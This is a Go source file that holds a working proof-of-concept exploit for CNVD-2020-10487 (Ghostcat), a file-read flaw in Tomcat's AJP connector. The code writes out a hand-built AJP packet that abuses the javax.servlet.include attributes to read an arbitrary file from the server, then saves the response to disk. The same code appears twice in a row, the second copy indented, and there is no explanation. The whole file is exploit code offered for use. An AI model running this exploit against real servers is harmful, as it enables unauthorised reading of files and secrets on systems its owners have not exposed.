kaiili/CNVD-2020-10487.go

## CNVD-2020-10487.go
package main

import (
	"fmt"
	"io"
	"io/ioutil"
	"net"
	"os"
)

func poc(include_filename string, include_dirname string, addr string) {

	poc1 := string([]byte{
		0x12, 0x34, 0x00, 0xe0, //head
		0x02, 0x02, 0x00, // prefix_code method
		0x08, 0x48, 0x54, 0x54, 0x50, 0x2f, 0x31, 0x2e, 0x31, 0x00, //http/1.1
		0x00,
		0x06, 0x2f, 0x61, 0x2e, 0x6a, 0x73, 0x70, 0x00,
		//  request rui '/a.jsp'
		0x00,
		0x09, 0x31, 0x32, 0x37, 0x2e, 0x30, 0x2e, 0x30, 0x2e, 0x31, 0x00,
		0x00,
		0x09, 0x6c, 0x6f, 0x63, 0x61, 0x6c, 0x68, 0x6f, 0x73, 0x74, 0x00,
		0x00,
		0x05, 0x70, 0x6f, 0x72, 0x74, 0x6f, 0x00, 0x1f, 0x49, 0x00,
		0x00,
		0x01, 0xa0, 0x09, 0x00,
		0x09, 0x41, 0x41, 0x41, 0x41, 0x3d, 0x42, 0x42, 0x42, 0x42, 0x00, 0x0a, 0x00,
		0x21, 0x6a, 0x61, 0x76, 0x61, 0x78, 0x2e, 0x73, 0x65, 0x72, 0x76, 0x6c, 0x65, 0x74, 0x2e, 0x69, 0x6e, 0x63, 0x6c, 0x75, 0x64, 0x65, 0x2e, 0x72, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x5f, 0x75, 0x72, 0x69, 0x00,
		0x00,
		0x01, 0x2f, 0x00, 0x0a, 0x00,
		0x1f, 0x6a, 0x61, 0x76, 0x61, 0x78, 0x2e, 0x73, 0x65, 0x72, 0x76, 0x6c, 0x65, 0x74, 0x2e, 0x69, 0x6e, 0x63, 0x6c, 0x75, 0x64, 0x65, 0x2e, 0x70, 0x61, 0x74, 0x68, 0x5f, 0x69, 0x6e, 0x66, 0x6f, 0x00,
		0x00, byte(len(include_filename))})
	poc2 := string([]byte{0x00, 0x0a, 0x00, 0x22, 0x6a, 0x61, 0x76, 0x61, 0x78, 0x2e, 0x73, 0x65, 0x72, 0x76, 0x6c, 0x65, 0x74, 0x2e, 0x69, 0x6e, 0x63, 0x6c, 0x75, 0x64, 0x65, 0x2e, 0x73, 0x65, 0x72, 0x76, 0x6c, 0x65, 0x74, 0x5f, 0x70, 0x61, 0x74, 0x68, 0x00,
		0x00,
		byte(len(include_dirname)),})

	poc3 := string([]byte{0x00, 0xff,})

	poc_str := fmt.Sprintf("%s%s%s%s%s", poc1, include_filename, poc2, include_dirname, poc3)
	poc := []byte(poc_str)
	poc[3] = byte(len(poc) - 4)

	conn, _ := net.Dial("tcp", addr)
	defer conn.Close()
	conn.Write(poc)

	buf := make([]byte, 10240)
	limitReader := io.LimitReader(conn, 10240)
	limitReader.Read(buf)


	ioutil.WriteFile("result.html", buf, os.ModeAppend)
	fmt.Println("result save in result.html")

}

func main() {
	poc("index.html", "/", "127.0.0.1:8009")

}
	package main

	import (
	"fmt"
	"io"
	"io/ioutil"
	"net"
	"os"
	)

	func poc(include_filename string, include_dirname string, addr string) {

	poc1 := string([]byte{
	0x12, 0x34, 0x00, 0xe0, //head
	0x02, 0x02, 0x00, // prefix_code method
	0x08, 0x48, 0x54, 0x54, 0x50, 0x2f, 0x31, 0x2e, 0x31, 0x00, //http/1.1
	0x00,
	0x06, 0x2f, 0x61, 0x2e, 0x6a, 0x73, 0x70, 0x00,
	// request rui '/a.jsp'
	0x00,
	0x09, 0x31, 0x32, 0x37, 0x2e, 0x30, 0x2e, 0x30, 0x2e, 0x31, 0x00,
	0x00,
	0x09, 0x6c, 0x6f, 0x63, 0x61, 0x6c, 0x68, 0x6f, 0x73, 0x74, 0x00,
	0x00,
	0x05, 0x70, 0x6f, 0x72, 0x74, 0x6f, 0x00, 0x1f, 0x49, 0x00,
	0x00,
	0x01, 0xa0, 0x09, 0x00,
	0x09, 0x41, 0x41, 0x41, 0x41, 0x3d, 0x42, 0x42, 0x42, 0x42, 0x00, 0x0a, 0x00,
	0x21, 0x6a, 0x61, 0x76, 0x61, 0x78, 0x2e, 0x73, 0x65, 0x72, 0x76, 0x6c, 0x65, 0x74, 0x2e, 0x69, 0x6e, 0x63, 0x6c, 0x75, 0x64, 0x65, 0x2e, 0x72, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x5f, 0x75, 0x72, 0x69, 0x00,
	0x00,
	0x01, 0x2f, 0x00, 0x0a, 0x00,
	0x1f, 0x6a, 0x61, 0x76, 0x61, 0x78, 0x2e, 0x73, 0x65, 0x72, 0x76, 0x6c, 0x65, 0x74, 0x2e, 0x69, 0x6e, 0x63, 0x6c, 0x75, 0x64, 0x65, 0x2e, 0x70, 0x61, 0x74, 0x68, 0x5f, 0x69, 0x6e, 0x66, 0x6f, 0x00,
	0x00, byte(len(include_filename))})
	poc2 := string([]byte{0x00, 0x0a, 0x00, 0x22, 0x6a, 0x61, 0x76, 0x61, 0x78, 0x2e, 0x73, 0x65, 0x72, 0x76, 0x6c, 0x65, 0x74, 0x2e, 0x69, 0x6e, 0x63, 0x6c, 0x75, 0x64, 0x65, 0x2e, 0x73, 0x65, 0x72, 0x76, 0x6c, 0x65, 0x74, 0x5f, 0x70, 0x61, 0x74, 0x68, 0x00,
	0x00,
	byte(len(include_dirname)),})

	poc3 := string([]byte{0x00, 0xff,})

	poc_str := fmt.Sprintf("%s%s%s%s%s", poc1, include_filename, poc2, include_dirname, poc3)
	poc := []byte(poc_str)
	poc[3] = byte(len(poc) - 4)

	conn, _ := net.Dial("tcp", addr)
	defer conn.Close()
	conn.Write(poc)

	buf := make([]byte, 10240)
	limitReader := io.LimitReader(conn, 10240)
	limitReader.Read(buf)


	ioutil.WriteFile("result.html", buf, os.ModeAppend)
	fmt.Println("result save in result.html")

	}

	func main() {
	poc("index.html", "/", "127.0.0.1:8009")

	}